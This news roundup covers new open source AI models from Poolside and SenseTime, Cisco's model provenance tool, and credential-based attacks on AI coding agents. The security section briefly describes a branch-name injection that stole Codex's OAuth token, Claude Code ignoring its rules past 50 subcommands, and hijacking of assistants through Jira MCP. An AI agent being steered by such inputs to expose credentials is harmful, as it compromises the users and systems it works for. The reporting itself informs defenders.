Poolside, a San Francisco-based AI startup founded in 2023, on Tuesday launched two new open source Laguna large language models optimized for autonomous coding workflows. According to VentureBeat, the release marks a significant entry from a U.S. company into the increasingly competitive open source AI model space dominated by Chinese firms.
The launch comes alongside new releases from Chinese AI companies, including SenseTime’s SenseNova U1 image model and ongoing security concerns around AI coding agents following multiple credential-based exploits.
Poolside’s Laguna Models Target Agentic Coding
Poolside’s Laguna XS.2 models are designed specifically for agentic workflows — AI systems that can write code, use third-party tools, and take autonomous actions beyond simple chat or content generation. The company released both models under open source licensing, positioning them as affordable alternatives to proprietary frontier models from OpenAI and Anthropic.
According to Poolside’s announcement, the models offer “affordable intelligence” while maintaining competitive performance on coding tasks. The company also launched “pool,” a coding agent harness, and “shimmer,” a web-based mobile-optimized development environment for interactive code preview.
https://x.com/eisokant/status/2049142230397370537
The timing reflects broader market dynamics where Chinese companies like DeepSeek and Xiaomi have gained ground by offering near-frontier performance at significantly lower costs than U.S. proprietary models. Poolside’s entry represents a rare U.S. contribution to the open source AI model ecosystem.
SenseTime Releases Speed-Optimized Image Model
Chinese AI company SenseTime on Tuesday released SenseNova U1, an open source model that processes images directly without first converting them to text. According to Wired, this approach significantly reduces computing requirements and processing time compared to competing U.S. models.
“The model’s entire reasoning process is no longer limited to text. It can reason with images as well,” Dahua Lin, SenseTime’s cofounder and chief scientist, told Wired. Lin, who also serves as a professor at the Chinese University of Hong Kong, said direct image processing capabilities will enable robots to better understand physical environments.
SenseTime designed U1 to run on Chinese-made chips, addressing U.S. export restrictions that limit Chinese firms’ access to advanced Western semiconductors. Ten Chinese chip designers, including Cambricon and Biren Technology, announced compatibility with U1 on release day.
The company released U1 for free on Hugging Face and GitHub, continuing the trend of Chinese firms becoming major contributors to open source AI development. SenseTime was sanctioned by the U.S. government and has sought to reclaim market position after slipping in China’s competitive AI landscape.
Security Vulnerabilities Plague AI Coding Agents
Multiple AI coding assistants, including OpenAI’s Codex, Anthropic’s Claude Code, and Microsoft’s Copilot, suffered credential-based security exploits over the past nine months. According to VentureBeat, every successful attack targeted credentials rather than the AI models themselves.
BeyondTrust researchers demonstrated that a crafted GitHub branch name could steal Codex’s OAuth token in cleartext, which OpenAI classified as Critical P1. Days later, Claude Code’s source code leaked to the public npm registry, and security firm Adversa discovered the system ignored its own security rules when commands exceeded 50 subcommands.
“Enterprises believe they’ve ‘approved’ AI vendors, but what they’ve actually approved is an interface, not the underlying system,” Merritt Baer, CSO at Enkrypt AI and former Deputy CISO at AWS, told VentureBeat. The pattern reveals AI coding agents authenticate to production systems without proper human session anchoring.
The vulnerability pattern was first demonstrated at Black Hat USA 2025, when Zenity CTO Michael Bargury hijacked multiple AI systems including ChatGPT, Microsoft Copilot Studio, and Google Gemini using Jira MCP integration. Nine months later, credential theft remains the primary attack vector.
Cisco Addresses AI Model Provenance Challenges
Cisco on Thursday released Model Provenance Kit, an open source tool designed to help organizations track and verify third-party AI models. According to SecurityWeek, the tool addresses security and compliance risks associated with models from repositories like HuggingFace, where millions of models are available with varying levels of documentation.
Organizations often deploy AI models without tracking modifications or verifying developer claims about model sources, vulnerabilities, and training biases. “If unaccounted for, those vulnerabilities can continue to propagate, whether they affect an internal chatbot, an agent application, or a customer-facing tool,” Cisco explained in its announcement.
The lack of model provenance creates multiple risk categories: security vulnerabilities from poisoned or manipulated models, compliance issues related to government AI documentation requirements, and supply chain integrity problems from unverified developer claims. Without proper lineage tracking, organizations cannot trace incidents to root causes or determine which other models in their technology stack face similar risks.
Cisco’s tool aims to provide transparency into model development history, enabling better risk assessment and incident response capabilities for enterprise AI deployments.
What This Means
The simultaneous release of multiple open source AI models signals intensifying competition in the AI development landscape. Poolside’s entry demonstrates that U.S. companies can compete in open source AI, challenging the narrative that Chinese firms dominate this space due to regulatory and economic advantages.
SenseTime’s focus on Chinese chip compatibility highlights how geopolitical tensions are driving technological bifurcation. Companies are designing AI systems specifically to work within their respective regulatory and supply chain constraints, potentially creating parallel AI ecosystems.
The persistent security vulnerabilities in AI coding agents reveal fundamental architectural problems that extend beyond individual companies or models. The pattern of credential-based attacks suggests enterprises need new security frameworks specifically designed for AI agent deployments, rather than treating them as traditional software applications.
FAQ
What makes Poolside’s Laguna models different from other coding AI?
Laguna models are specifically optimized for agentic workflows, meaning they can autonomously write code, use tools, and take actions beyond simple code generation. They’re released as open source with affordable pricing, targeting developers who want local deployment options.
Why can’t Chinese AI companies use the best chips for training?
U.S. export controls restrict Chinese firms from accessing advanced AI training chips, primarily those made by NVIDIA and other Western companies. This forces Chinese companies to design models that work with domestically produced semiconductors, which typically offer lower performance.
How do credential attacks against AI coding agents work?
Attackers exploit the fact that AI coding agents hold credentials to access production systems like GitHub or cloud platforms. By manipulating inputs (like malicious branch names), attackers can trick the AI into exposing these credentials or performing unauthorized actions using them.
Related news
- Trezor: “Open source is the very basic pillar of security” amid AI risks and quantum threats – The Cryptonomist – Google News – AI Security
- DenseOn with the LateOn: Open State-of-the-Art Single and Multi-Vector Models – HuggingFace Blog
- NVIDIA Isaac GR00T N1.7: Open Reasoning VLA Model for Humanoid Robots – HuggingFace Blog






